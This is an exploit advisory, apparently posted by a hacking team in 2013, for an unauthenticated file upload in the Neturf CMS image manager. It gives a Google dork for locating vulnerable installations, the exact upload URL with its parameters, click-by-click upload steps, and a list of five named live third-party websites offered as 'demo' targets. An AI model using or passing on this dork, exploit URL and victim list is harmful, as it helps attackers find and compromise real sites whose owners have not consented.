####################################################### # # [+] Exploit Title : Image uploader Neturf File Upload Vulnerability # [+] Google Dork : intext:"Powered by: Neturf" inurl:/index.php?Action= # [+] Date : 14/09/2013 # [+] Exploit Author : Iranian_Dark_Coders_Team # [+] Discovered By : am22[Hacker Pir] # [+] Exploit By : Black.Hack3r # [+] Home : http://www.idc-team.net # [+] Category: webapps # [+] Cms Homepage : http://www.neturf.com/ # [+] Version : All Version # [+] Tested on : Windows 7 & Linux # ####################################################### # # [+] Exploit: # # [+] http://[localhost]/[path]/common/ImageManager/index.php?Action=Upload&ImagePath=/images/products/&ImageName=4_01 # ####################################################### # # [+] Proof: # # [+] http://[localhost]/common/ImageManager/index.php?Action=Upload&ImagePath=/images/products/&ImageName=4_01 # [+] Then click the Browse button and select your file # [+] ExmImage Upload : [ Def.jpg & Def.gif & Def.png ] # [+] Then click the Upload Image button for Upload File # [+] Preview file upload : http://[localhost]/[path]/images/products/4_01.gif # ####################################################### # # [+] Demo site: # # [+] http://www.neturf.com//common/ImageManager/index.php?Action=Upload&ImagePath=/images/products/&ImageName=4_01 # [+] http://www.rahusa.us//common/ImageManager/index.php?Action=Upload&ImagePath=/images/products/&ImageName=4_01 # [+] http://www.samedayautoservice.com//common/ImageManager/index.php?Action=Upload&ImagePath=/images/products/&ImageName=4_01 # [+] http://www.tobyoft.com//common/ImageManager/index.php?Action=Upload&ImagePath=/images/products/&ImageName=4_01 # [+] http://www.auracabinetry.com//common/ImageManager/index.php?Action=Upload&ImagePath=/images/products/&ImageName=4_01 # ####################################################### # # [+] Discovered By : am22[Hacker Pir] # [+] Exploit By : Black.Hack3r # [+] We Are : M.R.S.CO,Black.Hack3r,N3O # [+] SpTnx : Mr.Cicili,Sec4ever,shahram black hat,C@M!S3R_H3X,@3is,HOt0N,All Members In wWw.IDC-TeaM.neT/cc # [+] Home : http://wWw.IDC-TeaM.neT # #######################################################